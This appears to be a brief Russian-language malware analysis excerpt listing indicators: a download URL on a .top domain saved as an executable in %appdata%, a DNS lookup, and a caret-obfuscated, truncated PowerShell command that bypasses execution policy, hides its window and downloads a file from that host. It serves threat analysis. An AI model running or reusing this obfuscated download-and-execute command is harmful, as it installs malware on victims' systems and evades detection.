Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^oW^E^rs^Hel^L.E^xe -^exE^cuti^ONp^ol^icy bYpa^s^S^ -^N^OpRO^f^ile -^w^IN^dOWStYl^E ^HI^D^DEn^ (nE^w^-O^B^jEcT S^y^stEm.N^E^T.WEbclI^en^t).^DOW^N^L^OaDfile('http://toagoore...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /c "P^oW^E^rs^Hel^L.E^xe -^exE^cuti^ONp^ol^icy bYpa^s^S^ -^N^OpRO^f^ile -^w^IN^dOWStYl^E ^HI^D^DEn^ (nE^w^-O^B^jEcT S^y^stEm.N^E^T.WEbclI^en^t).^DOW^N^L^OaDfile('http://toagoore...' (со скрытым окном)